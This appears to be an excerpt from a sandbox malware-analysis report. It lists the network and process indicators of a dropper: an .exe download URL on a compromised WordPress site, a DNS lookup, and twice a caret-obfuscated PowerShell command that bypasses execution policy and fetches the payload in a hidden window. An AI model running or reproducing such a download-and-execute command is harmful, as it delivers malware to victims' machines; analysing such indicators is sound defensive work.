Technical Information
- http://nsholiday.com/wp-content/plugins/huwjzr/4dui5.exe as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^wE^Rs^h^ELl.^eX^e -execUT^I^oN^p^O^Lic^y BYpaSs^ ^-NOP^ro^f^iLe ^-WI^nDOwS^tyLE ^H^id^dE^N^ (NE^w^-O^BJ^e^c^T SYs^te^M.n^eT.WEBCL^iE^Nt).doW^Nl^O^A^dfil^e('http://nsholida...
- %APPDATA%.exe
- 'ns###iday.com':80
- http://ns###iday.com/wp-content/plugins/HUwjZr/4DUi5.exe
- DNS ASK ns###iday.com
- '<SYSTEM32>\cmd.exe' /C "po^wE^Rs^h^ELl.^eX^e -execUT^I^oN^p^O^Lic^y BYpaSs^ ^-NOP^ro^f^iLe ^-WI^nDOwS^tyLE ^H^id^dE^N^ (NE^w^-O^BJ^e^c^T SYs^te^M.n^eT.WEBCL^iE^Nt).doW^Nl^O^A^dfil^e('http://nsholida...' (with hidden window)